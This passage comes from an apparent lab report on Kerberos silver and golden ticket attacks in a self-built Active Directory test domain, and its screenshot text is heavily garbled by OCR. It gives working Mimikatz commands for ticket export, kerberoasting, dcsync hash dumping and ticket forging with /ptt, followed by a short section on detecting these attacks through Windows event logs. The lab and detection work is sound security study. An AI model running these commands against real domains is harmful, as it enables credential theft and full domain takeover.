+ IPv6DNS Server
673
+ NetBlOS over Tcpip En...
674
+ Yes
675
+ LinkHocal IPv6 Address
676
+ fe80:5121:99b7:761f:c69d%4
677
+ IPv6 Default Gateway
678
+ IPv6 DNS Server
679
+ A
680
+ <
681
+ Close
682
+ CloseServerManagerDashboard
683
+ PA
684
+ lohVee
685
+ WELCOME TO SERVER MANAGER
686
+ Loxal Senver
687
+ il Al Senves
688
+ Configurethis local server
689
+ TIDHO
690
+ OUICX 1SAE
691
+ 品ONS
692
+ 2Add roles and features
693
+ o is
694
+ 3Addotherservers tomanage
695
+ all Remote Acoist
696
+ WHATSAW
697
+ 4Createaservergroup
698
+ 5Connect this server to cloud services
699
+ ROLES AND SERVER GROUPS
700
+ ADDS
701
+ TDHCP
702
+ 品DNS
703
+ File and Storage
704
+ ervice
705
+ Bos
706
+ Managubity
707
+ ①Manageabity
708
+ ①Manageabity
709
+ ①Marageabity
710
+ Managabity
711
+ tvents
712
+ tvents
713
+ trents
714
+ tuentt
715
+ Events
716
+ Senicet
717
+ Senices
718
+ Senvicts
719
+ Ferfomanor
720
+ Pertomance
721
+ Performanct
722
+ Performance
723
+ BPA seuts
724
+ SPA resuls
725
+ BPA reuts
726
+ BPA results
727
+ BPA.result
728
+ dli Remote Access
729
+ iliAllSeve
730
+ ①Managebaty
731
+ ①Managebity
732
+ ①Manageabity
733
+ Events
734
+ Fvens
735
+ Servces
736
+ Eees
737
+ Senvices
738
+ Services
739
+ Petomarce
740
+ aunieyad
741
+ BPA vsts
742
+ IPA reults
743
+ BPA reslts
744
+ 4/3/2022 94) AM
745
+ 4/3/9022 941.AM
746
+
747
+
748
+ Figure 13: DHCP on DC
749
+
750
+ It will also act as the DNS server for its clients, and it
751
+ will be able to route traffic to the Internet. Most
752
+ importantly, however, the DC is running Windows
753
+ Active Directory, and will act as the KDC for
754
+ Kerberos. It is responsible for the grippot.com
755
+ domain, which can be seen in Figure 14.
756
+ Figure 14: The grippot.com Domain
757
+
758
+ The _ADMINS and _USERS organizational units
759
+ were created for the experiment. All the other
760
+ containers were created by default when AD was
761
+ configured on this server.
762
+ The next system in this environment is the
763
+ Windows 10 client. This is simply a Windows 10
764
+ VM that is a part of the grippot.com domain.
765
+
766
+ Figure 15: Windows Client
767
+
768
+ It has one internal NIC (Figure 15) that is connected
769
+ to the domain controller. This is the machine that will
770
+ act as a legitimate user that wants to access the SQL
771
+ server within the domain.
772
+ The SQL server is another Windows Server 2019
773
+ machine with an internal NIC similar to the client.
774
+
775
+ Figure 16: Microsoft SQL Server Management Studio
776
+
777
+ It is running Microsoft SQL Server 2019 with
778
+ Windows Authentication mode enabled to allow for
779
+ Kerberos authentication for clients in the domain.
780
+ Clients can connect to this SQL server either with the
781
+ Microsoft SQL Server Management Studio as shown
782
+ above in Figure 16, or they can use the sqlcmd utility
783
+ to access it through a command-line interface. They
784
+ will connect to the server through TCP 1433, which
785
+ is the most common port for SQL. It is important to
786
+ note that this service is not inherently vulnerable to
787
+ ticket forgery attacks. This is because of the default
788
+ service account that runs the MSSQLsvc service.
789
+
790
+
791
+ Figure 17: MSSQLsvc
792
+
793
+ The Log on service account for MSSQLsvc must be
794
+ changed for the SQL server to be vulnerable to ticket
795
+ forgery attacks. As shown in Figure 17, it has been
796
+ changed to the SQLServiceAcc user in Active
797
+ Directory, which has a weak password that we will
798
+ be able to crack. This means that TGS tickets for the
799
+ SQL server will be encrypted with the password of
800
+ the SQLServiceAcc’s password which is set to
801
+ Password123.
802
+ Lastly, the attacker machine is running Windows
803
+ 10. It is part of the local area network and is
804
+ connected to the DC through its internal NIC. This
805
+ could emulate an attacker who has gained access to
806
+ the network, or an attacker who has compromised a
807
+ Windows 10 machine within the domain. This is the
808
+ machine that will be used to forge Kerberos tickets.
809
+
810
+ IV. EXPERIMENT
811
+ An important point to understand about ticket
812
+ forgery attacks in Active Directory is that they are a
813
+ post-exploitation technique. This means that an
814
+ attacker already has compromised a machine within
815
+ the network and is looking to escalate their privileges
816
+
817
+ Spot Verifier
818
+ Verifies potential file syst...
819
+ Manual (Trig...
820
+ Local System
821
+ SQL Server (MSSQLSERVER)
822
+ Provides storage, proces... Running Automatic
823
+ SQLServiceAcc@grippot.com
824
+ SQL Server Agent (MSSQLSER...
825
+ Executes jobs, monitors ...
826
+ Manual
827
+ NT Service SQLSERVERAGENT
828
+ SQL Server Browser
829
+ Provides SQL Server con...
830
+ Disabled
831
+ Local Service
832
+ SQL Server CEIP service (MSSQ... CEIP service for Sql server
833
+ Running
834
+ Automatic
835
+ NT Service SQLTELEMETRY
836
+ : SQL Server VSS Writer
837
+ Provides the interface to...
838
+ Running
839
+ Automatic
840
+ Local SystemDHCP
841
+ V
842
+ v
843
+ B IPv4
844
+ Scope [172.16.0.0] 172.16.0.100-200
845
+ Server Options
846
+ Policies
847
+ Filters
848
+ IPv6Active Directory Users and Computers
849
+
850
+ X
851
+ File
852
+ Action
853
+ View
854
+ Help
855
+ 1
856
+ Active Directory Users and Computers [Win!
857
+ Name
858
+ Type
859
+ Description
860
+ Saved Queries
861
+ E_ADMINS
862
+ Organizational...
863
+ V
864
+ grippot.com
865
+ _USERS
866
+ Organizational...
867
+ _ADMINS
868
+ Builtin
869
+ _USERS
870
+ builtinDomain
871
+ Computers
872
+ Container
873
+ Default container for up...
874
+ Builtin
875
+ Domain Con...
876
+ Computers
877
+ Organizational...
878
+ Default container for do...
879
+ Domain Controllers
880
+ ForeignSecu...
881
+ Container
882
+ Default containerfor sec...
883
+ ForeignSecurityPrincipals
884
+ Managed Se...
885
+ Container
886
+ Default container for ma...
887
+ ManagedServiceAccounts
888
+ Users
889
+ Container
890
+ Default containerforup...
891
+ UsersNetwork Connection Details:
892
+ Property
893
+ Value
894
+ Connection-specific DN...
895
+ grippot.com
896
+ Description
897
+ Irntel(R) PRO/1000 MT Desktop Adapter
898
+ Physical Address
899
+ 08-00-27-63-EF-3F
900
+ DHCPEnabled
901
+ Yes
902
+ IPv4 Address
903
+ 172.16.0.100
904
+ IPv4 Subnet Mask
905
+ 255.255.255.0
906
+ Lease Obtained
907
+ Thursday. February 25, 1886 6:36:22 AM
908
+ Lease Expires
909
+ Monday. April 11, 2022 10:04:39 AM
910
+ IPv4 Default Gateway
911
+ 172.16.0.1
912
+ IPv4 DHCP Server
913
+ 172.16.0.1
914
+ IPv4 DNS Server
915
+ 172.16.0.1MicrosoftSQLServerManagementStudic
916
+ File
917
+ P3
918
+ View
919
+ Tools
920
+ Window
921
+ Help
922
+ NewQuery
923
+ Execute
924
+ ObjectExplorer
925
+ Connect-
926
+ SQLSERVER(SQLServer15.0.2000.5-GRIPPOT/a-tgrippo)
927
+ Databases
928
+
929
+ Security
930
+ Server Objects
931
+
932
+ Replication
933
+ +
934
+ PolyBase
935
+ Always On High Availability
936
+
937
+ Management
938
+ IntegrationServicesCatalogs
939
+ SQLServer Agent (Agent XPs disabled)
940
+ 田图XEventProfilerVerifies potential file syst..
941
+ Manual (Trg...
942
+ LocalSystem
943
+ QSQLServer(MSSQLSERVER)
944
+ Provides storage, proces...
945
+ Running
946
+ Automatic
947
+ SQLServiceAcc@grippot.com
948
+ Executes jobs, monitors ...
949
+ Manual
950
+ NTServiceiSQLSERVERAGENT
951
+ O.SQL Server Browser
952
+ Provides SQL Server con...
953
+ Disabled
954
+ LocalService
955
+ Q SQL Server CEIP service (MSSQ...
956
+ CEIP servicefor Sql server
957
+ Running
958
+ Automatic
959
+ NT Service)SQLTELEMETRY
960
+ OSQLServer VSS Writer
961
+ Provides the interfaceto...
962
+ Running
963
+ Automatic
964
+ Local System
965
+ and pivot to other machines. For example, an
966
+ attacker may exploit some vulnerability in a
967
+ machine and create a reverse shell or command and
968
+ control (C2) channel so that they can control it from
969
+ their own machine. They would then look for other
970
+ machines on the network that they can potentially
971
+ access and attempt to forge Kerberos tickets to gain
972
+ control over more resources.
973
+ The most popular tool for forging Kerberos
974
+ tickets, and for Kerberos vulnerabilities in general,
975
+ is Mimikatz [9]. This is a popular open-source tool,
976
+ that is used by both attackers and penetration testers
977
+ to escalate privileges within a Windows network. It
978
+ is a post-exploitation tool that would typically have
979
+ to be downloaded onto the compromised machine.
980
+
981
+ Alternatively, attackers who have established a
982
+ meterpreter shell on the compromised host can use
983
+ the Mimikatz script through Metasploit without
984
+ having to download it on the disk of the host [10].
985
+ Given how popular Metasploit is, this is the most
986
+ common workflow.
987
+ This experiment is focused on the forged Kerberos
988
+ tickets. Thus, we will not be going over any
989
+ exploitation techniques with Metasploit or similar
990
+ frameworks. Since we created this environment, we
991
+ have the advantage of knowing all the credentials for
992
+ the
993
+ machines
994
+ and
995
+ controlling
996
+ their
997
+ security
998
+ mechanisms. Leveraging this, we will skip over the
999
+ initial exploitation phase, and get right into Mimikatz
1000
+ and forging Kerberos tickets using the Windows 10
1001
+ attacker machine.
1002
+
1003
+ A. Silver Ticket Attack
1004
+ To review, the silver ticket attack involves forging
1005
+ a TGS ticket for a specific service in the network. In
1006
+ this case, the MSSQLsvc service on the SQL server
1007
+ machine. For this to be successful, an attacker would
1008
+ need the password or NTLM service hash of the
1009
+ service account to properly encrypt the TGS ticket.
1010
+ To perform the attack, we will need to crack this hash
1011
+ to get the password so that we can use it to forge
1012
+ tickets.
1013
+
1014
+ 1) Download the Mimikatz Tool: We will first
1015
+ download
1016
+ the
1017
+ Mimikatz
1018
+ tool
1019
+ from
1020
+ https://github.com/gentilkiwi/mimikatz/releases onto
1021
+ the attacker machine and extract the contents of the
1022
+ ZIP file. The executable file \x64\mimikatz.exe will
1023
+ be used to forge the TGS ticket. It is important to
1024
+ note that Windows Defender Antivirus will flag this
1025
+ download as malicious and must be disabled before
1026
+ downloading.
1027
+
1028
+ 2) Obtain the Service Account Password: To get
1029
+ the password of the service account that will be used
1030
+ to encrypt the TGS, an attacker would first need to
1031
+ steal a legitimate TGS ticket. There are several ways
1032
+ to do this such as sniffing the network traffic in the
1033
+ local area network and hoping that a legitimate user
1034
+ requests the TGS [11]. For the simplicity of this lab,
1035
+ we will just take the real TGS ticket from the
1036
+ Windows 10 client machine. Kerberos tickets are
1037
+ stored in a cache in memory and can be viewed with
1038
+ the klist command. To extract these tickets from
1039
+ memory, we can use the Mimikatz command
1040
+ kerberos::list /export as shown in Figure 18.
1041
+
1042
+ Figure 18: Exporting Kerberos Tickets with Mimikatz
1043
+
1044
+ The TGS ticket on the bottom is the one that we
1045
+ want. As seen above, it is for sqlserver.grippot.com
1046
+ in the GRIPPOT.COM domain and used by the bross
1047
+ user account which is currently logged in to the
1048
+ Windows 10 client. It is encrypted with RC4 and is
1049
+ valid for 10 hours. Mimikatz will store each of these
1050
+ tickets as files in the current working directory. We
1051
+ can then copy the TGS ticket over to the attacker
1052
+ machine VM.
1053
+ Once the attacker has stolen the TGS ticket, they
1054
+ can then begin to crack the password used to encrypt
1055
+ the ticket through a technique called kerberoasting.
1056
+ Kerberoasting is a technique where an attacker
1057
+ attempts to brute force the password of a service
1058
+ account offline [12]. This is possible because all the
1059
+ tickets in the domain are encrypted with the RC4
1060
+ algorithm which is weaker than the default AES256.
1061
+
1062
+ Figure 19: Local Group Policy Settings on Domain Controller
1063
+
1064
+ The supported Kerberos encryption algorithms can be
1065
+ changed in the Local Group Policy Settings as shown
1066
+ in Figure 19. This setting must be changed on all
1067
+ computers in the domain.
1068
+ To crack the hash, we will use the Kerberos tool
1069
+ kit which can be found on GitHub [13]. Specifically,
1070
+
1071
+ O mimikatz 2.2.0 x64 (oe.eo)
1072
+ 00000000l- 8x00000017- rc4 hmac nt
1073
+ Start/End/MaxRenew:4/9/20227:48:44 AM:4/9/20225:48:44PM:4/16/20227:48:44AM
1074
+ Server Name
1075
+ :krbtgt/GRIPPOT.COM @GRIPPOT.COM
1076
+ client Name
1077
+ :brOss @ GRIPPOT.COM
1078
+ Flags40e1000o
1079
+ :namecanonicalize;pre_authent ; initial ;renewable: forwardable
1080
+ * saved to file
1081
+ : -4oe1oooo-bross@krbtgt-GRIPPOT.COM-GRIPPOT.COM.kirbi
1082
+ -x00900017-rc4hmacnt
1083
+ Start/End/MaxRenew:4/9/20229:33:10AM:4/9/20225:48:44PM:4/16/20227:48:44AM
1084
+ Server Name
1085
+ :Cifs/FileSERVER @ GRIPPOT.COM
1086
+ client Name
1087
+
1088
+ bross @ GRIPPOT.COM
1089
+ Flags 40a10000
1090
+ : name_canonicalize;pre_authent:renewable:forwardable;
1091
+ * Saved to file
1092
+ :1-4oa1oooo-bross@cifs~FileSERVER-GRIPPOT.COM.kirbi
1093
+ [0000002]-ex0000017-rc4_hmac_nt
1094
+ Start/End/MaxRenew:4/9/2022 9:29:01 AM :4/9/20225:48:44 PM;4/16/20227:48:44 AM
1095
+ Server Name
1096
+ LDAP/WinServer.grippot.com/grippot.com @ GRIPPoT.coM
1097
+ client Name
1098
+ : bross @ GRIPPOT.COM
1099
+ Flags 40a50000
1100
+ name canonicalize okas_delegate:pre authent ; renewable; forwardable
1101
+ * saved to file
1102
+ : 2-4oa5oooo-bross@LDAPWinServer.grippot.comrgrippot.com-GRIPpoT.cOM.kirbi
1103
+ 000000031-0x0000017-rc4hmacnt
1104
+ Start/End/MaxRenew:4/9/20227:48:44AM:4/9/20225:48:44PM:4/16/20227:48:44AM
1105
+ Server Name
1106
+ MSsQLSvc/sqlserver.grippot.com:1433 @ GRIPPoT.cOM
1107
+ client Name
1108
+ : brOss @ GRIPPOT.COM
1109
+ Flags 40a10000
1110
+ :name_canonicalize; pre_authent: renewable: forwardable:
1111
+ * Saved to file
1112
+ :3-4a1oooo-bross@M5sQLSvc~sqlserver.grippot.com1433-GRIPPoT.coM.kirbi
1113
+ mimikatz #Local GroupPolicy Editor
1114
+ File
1115
+ Action
1116
+ VEW
1117
+ Help
1118
+ LocalComputerPolicy
1119
+ Policy
1120
+ Security Setting
1121
+ vComputerConfiguration
1122
+ Network access: Remotely accessible registry paths and sub...
1123
+ Software Settings
1124
+ System/CurrentControls...
1125
+ Windows Settings
1126
+ Network access: Restrict anonymous accessto Named Pipes...Enabled
1127
+ Network access: Restrict clients allowed to make remote call... Not Defined
1128
+ NameResolution Policy
1129
+ Scripts (Startup/Shutdown)
1130
+ Network access: Shares that can be accessed anonymously
1131
+ Not Defined
1132
+ Deployed Printers
1133
+ Network access: Sharing and security model for local accou...
1134
+ Classic - local users auth..
1135
+ Security Settings
1136
+ Network security: Allow Local System to use computer ident... Not Defined
1137
+ Account Policies
1138
+ Network security: Allow LocalSystem NULL session fallback
1139
+ Not Defined
1140
+ aLocal Policies
1141
+ Network security: Allow PKU2U authentication requests to t...
1142
+ Not Defined
1143
+ aAudit Policy
1144
+ Networksecurity:Configure encryption types allowedforKe...RC4_HMAC_MD5
1145
+ User Rights Assignment
1146
+ Network security:DonotstoreLAN Managerhashvalueon...
1147
+ Enabled
1148
+ Security Options
1149
+ Network security: Force logoff when logon hours expire
1150
+ Disabled
1151
+ WindowsDefenderFirewall
1152
+ Network security:LAN Managerauthenticationlevel
1153
+ Not Defined
1154
+ Network List Manager Polici
1155
+ Network security: LDAP client signing requirements
1156
+ Negotiate signing
1157
+ Public Key Policies
1158
+ Networksecurity:MinimumsessionsecurityforNTLMSSP...
1159
+ Require 128-bit encrypti...
1160
+ Software Restriction Policies
1161
+ Network security: Minimum session security for NTLM SSP ...
1162
+ Require 128-bit encrypti..
1163
+ Application Control Policies
1164
+ Network security: Restrict NTLM: Add remote server excepti...Not Defined
1165
+ ,IPSecurityPolicieson Local
1166
+ Network security: Restrict NTLM: Add server exceptions in t... Not Defined
1167
+ Advanced Audit Policy Conf
1168
+ Network security: Restrict NTLM: Audit Incoming NTLM Tra... Not Defined
1169
+ Policy-based Qos
1170
+ Network security: Restrict NTLM:Audit NTLM authenticatio...Not Defined
1171
+ the tgsrepcrack.py program will be used. The
1172
+ command to do this is shown below in Figure 20.
1173
+
1174
+
1175
+
1176
+
1177
+ Figure 20: Kerberoasting the Hash
1178
+ We give the program a custom wordlist that contains
1179
+ several common passwords to use. One of which is
1180
+ the correct password, Password123. We also supply
1181
+ the program with the legitimate TGS ticket that was
1182
+ stolen from the Windows 10 client machine. As seen
1183
+ in the screenshot, the password was successfully
1184
+ cracked and is displayed on the screen.
1185
+
1186
+ 3) Forge the TGS Ticket: Now that we have the
1187
+ password for the SQLServiceAcc user, which is
1188
+ running the MSSQLsvc service, we can begin to
1189
+ forge the silver ticket. Mimikatz will be used to do
1190
+ this, which has been downloaded onto the attacker
1191
+ machine. To forge a silver ticket, Mimikatz requires
1192
+ several arguments. First, you need the SID or security
1193
+ identifier of the domain. This is a string that is unique
1194
+ to the domain [14]. Each user account in Active
1195
+ Directory is identified by their SID with a RID or
1196
+ relative identifier concatenated at the end. Mimikatz
1197
+ will also need the name of the domain, the fully
1198
+ qualified domain name (FQDN) of the target, the
1199
+ name of the target’s service, the RC4 hash of the
1200
+ password, and the name of the user to impersonate.
1201
+
1202
+
1203
+ Figure 21: Creating the Silver Ticket
1204
+
1205
+ The full command is shown above in Figure 21.
1206
+ Mimikatz has successfully created the forged TGS
1207
+ ticket for the bross user. As specified by the /ptt
1208
+ option, Mimikatz has automatically stored the ticket
1209
+ in the Kerberos cache in memory.
1210
+
1211
+ 4) Access the SQL Server: With the TGS ticket in
1212
+ the cache, the attacker machine can now access the
1213
+ MSSQLsvc as the bross user.
1214
+
1215
+
1216
+ Figure 22: Successful Authentication to MSSQLsvc
1217
+
1218
+ Using
1219
+ the
1220
+ sqlcmd
1221
+ -S
1222
+ SQLServer.grippot.com
1223
+ command, the attacker can successfully access the
1224
+ MSSQLsvc. In Figure 22, the SQL query shows that
1225
+ the service believes the logged-in user is bross. The
1226
+ forged TGS ticket is also shown above using the klist
1227
+ command.
1228
+
1229
+ B. Golden Ticket Attack
1230
+ Instead of the TGS ticket, the golden ticket attack
1231
+ aims to forge the TGT ticket. With a valid TGT ticket
1232
+ for a user with elevated privileges, an attacker can
1233
+ have great control over the domain. While this attack
1234
+ is more dangerous than the silver ticket attack, it is
1235
+ harder to perform in the real world. This is because
1236
+ an attacker would need to obtain the krbtgt account’s
1237
+ NTLM hash. This would involve compromising an
1238
+ account with elevated privileges in order to dump
1239
+ hashes of accounts within the domain.
1240
+ To see this attack in action, we will use the domain
1241
+ controller at WinServer.grippot.com, the Windows 10
1242
+ client, and the Windows 10 attacker machine which
1243
+ is not a part of the grippot.com domain.
1244
+
1245
+ 1) Obtain the krbtgt NTLM Hash: We will be
1246
+ using the Mimikatz tool to obtain the krbtgt NTLM
1247
+ hash. Mimikatz has a dcsync command that takes
1248
+ advantage of the Directory Replication Service
1249
+ Remote Protocol, or MS-DRSR [15]. This is a
1250
+ service used for communication between domains so
1251
+ that they can replicate information between each
1252
+ other [15]. By using the dcsync command in
1253
+ Mimikatz, we are essentially pretending to be a
1254
+ domain controller, and asking for the password data
1255
+ of the krbtgt account. However, for this to be
1256
+ possible, we need the proper permissions.
1257
+
1258
+ Figure 23: Replicating Directory Changes Permission
1259
+
1260
+
1261
+ X
1262
+ File
1263
+ Home
1264
+ Share
1265
+ View
1266
+ > This PC > Downloads >
1267
+ Search Downloads
1268
+ A
1269
+ Name
1270
+ Date modified
1271
+ Type
1272
+ Size
1273
+ ★Quickaccess
1274
+ Desktop
1275
+ VToday (3)
1276
+ Downloads
1277
+ 3-40a1000-bross@M5SQLSvc_sqlserver..
1278
+ 4/9/2022 9:40 AM
1279
+ KIRBI File
1280
+ 2KB
1281
+ Documents
1282
+ attack_details
1283
+ 4/9/2022 9:27 AM
1284
+ Text Document
1285
+ 1KB
1286
+ kerberoast-master
1287
+ 4/9/2022 9:44.AM
1288
+ Filefolder
1289
+ Windows PowerShell
1290
+ -
1291
+ server.grippot.con_1433-GRIPpoT.coH.kirbi
1292
+ USEHASHCAT,IT'SHELLAFASTER!!
1293
+ racking1tickets.
1294
+ foundpasswordfor
1295
+ ticket e:Password123
1296
+ File:.13-4ea1eeee-bross@MSSQLSvc_sqlserver.grippot.com_1433-GRIPPoT.CoM.kirbs
1297
+ C:\Users\attacker/Downloads>@mimikatz 2.2.0x54 (oe.eo)
1298
+ X
1299
+ #####��
1300
+ mimikatz2.2.e(x64)#19041Aug102021e2:01:23
1301
+ La Vie, A L'Anour"
1302
+ (oe.eo)
1303
+ 抽#/
1304
+ 排#
1305
+ >https://blog.gentilkiwi.com/mimikatz
1306
+ Benjamin DELPY
1307
+ gentilkiwi
1308
+ (benjamin@gentilkiwi.com)
1309
+ ##V#
1310
+ Vincent LE TOUX
1311
+ vincent.letouxegnail.com)
1312
+ mimikatz#kerberos::golden/sid:5-1-5-21-3521637253-38211e3896-1122387918/domain:GRIPPoT.coM/ptt/id:5es/target:SQL
1313
+ erver.grippot.com/service:MSSQLsvc/rc4:58A478135A93Ac3BF058A5EAeE8FDB71/user:bross
1314
+ User
1315
+ bross
1316
+ Domain
1317
+ GRIPPOT.COM(GRIPPOT)
1318
+ SID
1319
+ S-1-5-21-3521637253-3821103896-1122387918
1320
+ User Id
1321
+ roups
1322
+ 506
1323
+ Id
1324
+ 58a478135a93ac3bfe58a5eaee8fdb71-rc4_hmac_nt
1325
+ 513512529.518.519
1326
+ ServiceKey:
1327
+ Service
1328
+ MSSOLSVC
1329
+ Target
1330
+ SQLServer.grippot.com
1331
+ Lifetime
1332
+ Ticket :
1333
+ 4/9/202210:45:31 AM:
1334
+ /4/6/2932
1335
+ 10:45:31AM:4/6/203210:45:31AM
1336
+ Pass The Ticket
1337
+ PAC
1338
+ PAC
1339
+ generated
1340
+ signed
1341
+ EncTicketPart
1342
+ generated
1343
+ EncTicketPart
1344
+ KrbCred generated
1345
+ encrypted
1346
+ nimikatzVgrippot.com
1347
+ Advanced Security Settings forgrippot
1348
+ _ADMINS
1349
+ _USERS
1350
+ Owner:
1351
+ Administrators(GRIPPOT/Administrators)Change
1352
+ Computers
1353
+ Domain Controllers
1354
+ Permissions
1355
+ Auding
1356
+ Effective Access
1357
+ ForeignSecurityPrina
1358
+ Keys
1359
+ Foraditionalinfmation,doubeclickamissinntryTmfymsnentry,tthntyandclickEdit(ifvailae)
1360
+ LostAndFound
1361
+ Managed Service Ad
1362
+ Permission entries:
1363
+ Program Data
1364
+ Type
1365
+ Principal
1366
+ Access
1367
+ Inhe...
1368
+ Appliesto
1369
+ System
1370
+ Allow
1371
+ Cloneable Domain Controllers (..
1372
+ AllowaDCto createacloneof it...
1373
+ None
1374
+ This object only
1375
+ Users
1376
+ &Allow
1377
+ Enterprise Read-only Domain C.
1378
+ Replicating Directory Changes
1379
+ None
1380
+ This object only
1381
+ NTDS Quotas
1382
+ ZAllow
1383
+ Allow
1384
+ DomainControllers (GRIPPOTAD
1385
+ Replicating Divectory Changes
1386
+ Replicating DirectoryChanges All
1387
+ None
1388
+ This object only
1389
+ TPM Devices
1390
+ Tom Grippo (a-tgrippo@grippot..
1391
+ None
1392
+ This object andalldescendan Command Prompt - sqlcmd -S SQLServer-grippot.com - SQLCMD
1393
+ X
1394
+ CurrentLogonIdise:ex14925b
1395
+ Cached Tickets: (1)
1396
+ <e#
1397
+ Client:bross@GRIPPOT.COM
1398
+ KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
1399
+ startTine:4/9/2e221e:45:31(local)
1400
+ End Time:
1401
+ Renew Tine:
1402
+ 4/6/203210:45:31 (1oca1)
1403
+ 4/6/203210:45:31010ca11
1404
+ Session KeyType:RSADSIRC4-HMAC(NT)
1405
+ Cache Flags:e
1406
+ Kdc Called:
1407
+ C:lUsers\bross>sqlcmd-SSQLServer.grippot.com
1408
+ SELECT HOSTNAME()asHOstName,
1409
+ SUSER_NAMEO)
1410
+ LoggedInUser
1411
+ GC
1412
+ HostNane
1413
+ LoggedInUser
1414
+ ATTACKER
1415
+ GRIPPOTIbrOSS
1416
+ Lrowsaffected
1417
+ In Figure 23 we can see that the a-tgrippo account
1418
+ has the Replicating Directory Changes permission.
1419
+ This will allow us to use the dcsync command.
1420
+ From the Windows 10 client machine, we can use
1421
+ Mimikatz as the a-tgrippo account to dump the hash
1422
+ of the krbtgt account. This would simulate a
1423
+ compromised Windows machine within the domain
1424
+ that an attacker may utilize.
1425
+
1426
+ Figure 24: Obtaining krbtgt Hash
1427
+
1428
+ The command shown above is used to dump the
1429
+ NTLM hash along with other information pertaining
1430
+ to the krbtgt account. We will then copy this hash to
1431
+ the Attacker machine which is not part of the
1432
+ grippot.com domain. From there we can begin to
1433
+ forge the golden ticket.
1434
+
1435
+ 2) Forge the TGT Ticket: Now that the attacker
1436
+ has the krbtgt account hash, they can forge the TGT.
1437
+ We will use Mimikatz again to do this. It will require
1438
+ the targeted domain, the security identifier of the
1439
+ domain, the krbtgt hash, and the user that you wish to
1440
+ impersonate. In this case, we will be impersonating
1441
+ the Administrator account with the relative identifier
1442
+ of 500.
1443
+
1444
+
1445
+ Figure 25: Forging a TGT with Mimikatz
1446
+
1447
+ The Mimikatz command is shown in Figure 25
1448
+ above. The /ptt option is also passed so that the TGT
1449
+ is automatically copied to our cache in memory. With
1450
+ this ticket, we will be able to request TGS tickets
1451
+ from the domain controller so that we can access
1452
+ resources within the domain. Since we are
1453
+ impersonating the Administrator account, we can
1454
+ access the C: drive of the domain controller. This is
1455
+ shown in Figure 26 below.
1456
+
1457
+ Figure 26: Using the TGT
1458
+
1459
+ Using the TGT, we can access files within the
1460
+ domain controller from a machine that is not a part of
1461
+ the domain. More importantly, at the top of the
1462
+ screenshot in Figure 26 we can see that the TGT is
1463
+ valid for 10 years. This is the default expiration time
1464
+ for Mimikatz, and it will allow the attacker greater
1465
+ persistence in the domain.
1466
+
1467
+ C. Detection
1468
+ Detecting these types of attacks can be difficult,
1469
+ especially the silver ticket attack. The easiest way to
1470
+ gain visibility into the Kerberos authentication
1471
+ process is by looking at the Windows Security Event
1472
+ Logs. There are several logs that pertain to Kerberos
1473
+ including 4624, 4634, 4672, and 4769. The first three
1474
+ event IDs are related to login events. For instance,
1475
+ 4624 is the log generated when a user successfully
1476
+ logs in to a system [16]. By closely analyzing these
1477
+ security event logs it is possible to catch a forged
1478
+ ticket in action.
1479
+ For the golden ticket attack in this experiment, we
1480
+ can see a 4769 security event generated on the
1481
+ domain controller.
1482
+
1483
+ Figure 27: Windows Security Event 4769
1484
+
1485
+ This is for the request of a ticket granting service
1486
+ ticket. As shown in Figure 27, the ticket is requested
1487
+
1488
+ @ mimikatz 2.2.0x64 (oe.eo)
1489
+
1490
+ ####带
1491
+ m1m1katz2.2.0(x64)#19041 Aug.10202102:01:23
1492
+ 批#
1493
+ #排
1494
+ (oe.eo)
1495
+ ...
1496
+ Benjamin DELPY
1497
+ gentilkiwi
1498
+ (benjamin@gentilkiwi.con)
1499
+ >https://blog-gentilkiwi.com/mimikatz
1500
+ ##A##,
1501
+ Vincent LE TOUX
1502
+ vincent.letouxgmail.com
1503
+ >https://pingcastle.com/https://mysmartlogon.con***/
1504
+ mimikatz
1505
+ kerberos::golden/domain:grippot.con/sid:5S-1-5-21-3521637253-38211e3896-1122387918/id:5ee/user:Administrat
1506
+ /krbtgt:12d302e5cfedee9d1e3d21f7c5ef6187/ptt
1507
+ User
1508
+ Administrator
1509
+ SID
1510
+ Domain
1511
+ grippot.com
1512
+ 500
1513
+ 1-5-21-3521637253-3821103896-1122387918
1514
+ UserId
1515
+ 513512520518519
1516
+ ServiceKey:12d302e5cfedee9d1e3d21f7c5ef6187
1517
+ rc4.hmac_nt
1518
+ Lifetime
1519
+ 4/16/20229:34:02AM
1520
+ 4/7/20329:34:82AM:4/7/28329:34:02AM
1521
+ Ticket
1522
+ Pass The Ticket
1523
+ PAC
1524
+ generated
1525
+ PAC
1526
+ signed
1527
+ EncTicketPart
1528
+ EncTicketPart
1529
+ generated
1530
+ encrypted
1531
+ KrbCred generated
1532
+ Golden ticket for
1533
+ Administrator@grippot.com
1534
+ successfullysubmitted forcurrent session
1535
+ mimikatz[ Event Viewer
1536
+ -
1537
+ File
1538
+ Action
1539
+ View
1540
+ Help
1541
+ [ Event Viewer(Local
1542
+ weilabl
1543
+ Actions
1544
+ >CustomViews
1545
+ Keywor..
1546
+ Date and Time
1547
+ Source
1548
+ Event ID
1549
+ Task Category
1550
+ A
1551
+ Security
1552
+ [ Application
1553
+ Audi..
1554
+ 4/10/2022 9:35:33 AM
1555
+ Micros..
1556
+ 4769
1557
+ Kerberos Senice Ticket
1558
+ Open Saved Log.-
1559
+ Security
1560
+ Audi..
1561
+ 4/10/2022 9:35:33 AM
1562
+ Micros..
1563
+ 4769
1564
+ Kerberos Senvice Ticket..
1565
+ >
1566
+ Setup
1567
+ 7
1568
+ Create Custom View..
1569
+ System
1570
+ Evnt4769MicoftWindowssurityuditing
1571
+ x
1572
+ Import Custom View..
1573
+ Forwarded Events
1574
+ General
1575
+ Details
1576
+ Clear Log--
1577
+ Applications and Services Lo
1578
+ Filter Current Log--
1579
+ Subscriptions
1580
+ Account Informatiorc
1581
+ Adminitrator@grippot.com
1582
+ Account Name:
1583
+
1584
+ Properties
1585
+ Account Domain:
1586
+ grippot.com
1587
+ 9 Find..
1588
+ Logon GUID:
1589
+ (d4019063-6837-b09a-5a16-b731de0321a8)
1590
+ H Save All Events As.-
1591
+ Service Informaticn:
1592
+ Attacha TaskTothisLeg
1593
+ Serice Name:
1594
+ WINSERVERS
1595
+ Service ID:
1596
+ GRIPPOTWNSERVERS
1597
+ View
1598
+ Netwock liformatiorc
1599
+ Refreh
1600
+ Client Address
1601
+ F:172.16.0.102
1602
+ BHelp
1603
+ Client Port:
1604
+ Additicnal lnformation:
1605
+ Event 4769,MicrosoftWindows-
1606
+ Ticket Options:
1607
+ 0x40810000
1608
+ Event Properties
1609
+ Ticket Encryption Type
1610
+ 0x17
1611
